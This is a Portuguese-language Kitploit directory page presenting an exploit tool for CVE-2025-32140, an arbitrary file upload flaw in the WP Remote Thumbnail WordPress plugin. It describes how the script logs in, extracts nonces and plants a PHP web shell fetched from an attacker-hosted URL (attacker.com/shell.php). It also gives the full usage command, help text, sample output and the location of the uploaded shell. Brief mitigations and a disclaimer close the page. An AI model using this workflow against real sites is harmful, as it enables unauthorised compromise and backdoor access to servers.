Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 é vulnerável a Arbitrary File Upload | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-32140
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 é vulnerável a Arbitrary File Upload

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-32140 – Exploração do WP Remote Thumbnail (Upload Arbitrário de Arquivos)


📝 Descrição

CVE-2025-32140 é uma vulnerabilidade crítica no plugin WP Remote Thumbnail para WordPress. Ela permite que atacantes autenticados (com permissões de contributor ou superiores) façam upload de arquivos arbitrários, como web shells, abusando de uma funcionalidade falha que aceita URLs não sanitizadas.

O plugin não valida o tipo ou conteúdo do arquivo obtido da URL remote_thumb fornecida. Isso permite que atacantes salvem arquivos PHP maliciosos (ex.: backdoors) no diretório /wp-content/uploads.


⚠️ Componente Vulnerável

  • Plugin: WP Remote Thumbnail
  • Versões Vulneráveis: <= 1.3.2
  • Versão Corrigida: Ainda não lançada
  • Vetor de Ataque: Rede
  • Privilégios Necessários: Baixo (Usuário autenticado com capacidade edit_post)
  • Pontuação CVSS: 9.9 (Crítica)

  • 🛠 Script de Exploração

    Este script Python automatiza a exploração do CVE-2025-32140, executando os seguintes passos:

    1. Faz login no site WordPress alvo.
    2. Extrai automaticamente os nonces necessários.
    3. Cria e envia uma requisição maliciosa através do parâmetro remote_thumb.
    4. Envia um web shell para o site alvo.

    🔧 Opções de Linha de Comando

    OpçãoAliasDescrição
    --url-uURL do site WordPress alvo (ex.: http://target.com/wordpress)
    --username-unNome de usuário WordPress com privilégios de edição de posts
    --password-pSenha para o nome de usuário especificado
    --user_ID-uidID do usuário WordPress (geralmente 1 para admin)
    --post_ID-pidID do post a ser editado (pode ser um rascunho)
    --shellURL direta de um web shell PHP hospedado no servidor do atacante

    🚀 Uso

    root@kitploit:~
    python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
    

    📖 Uso e Ajuda

    root@kitploit:~
    
                                                                                                                    
    usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
    
    Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
      --username, -un USERNAME
                            Username
      --password, -p PASSWORD
                            Password
      --user_ID, -uid USER_ID
                            User ID (usually 1 for admin)
      --post_ID, -pid POST_ID
                            Target post ID
      --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
    
    

    📋 Exemplo de Saída

    root@kitploit:~
    [+] Logged in successfully.
    [+] Cookies set successfully.
    [DEBUG] Extracted _wpnonce: b4ef78e77d
    [DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
    [DEBUG] Extracted closedpostboxesnonce: 52be514040
    [DEBUG] Extracted samplepermalinknonce: 7b213c6597
    [DEBUG] Extracted wprthumb_nonce: 45803ee312
    [DEBUG] Extracted X-WP-Nonce: None
    [+] Exploit POST sent successfully. Check your uploads directory.
    By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
    
    

    📂 Localização do Shell

    Uma vez explorado, o web shell enviado provavelmente será armazenado em:

    root@kitploit:~
    http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
    

    Substitua YYYY/MM pelo ano e mês atuais do upload.


    🛡 Recomendações

    Para mitigar o risco representado por esta vulnerabilidade:

    1. Atualize o plugin para a versão mais recente (assim que uma correção for lançada).
    2. Restrinja as capacidades de upload de arquivos para usuários confiáveis apenas.
    3. Desabilite a funcionalidade de busca de thumbnail remota se não for necessária.

    ⚠️ Aviso Legal

    Este script é fornecido apenas para fins educacionais.
    O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta exploração.


    👤 Autor

    Por: Nxploited ( Khaled Alenazi ) 🌟

    Baixar ferramenta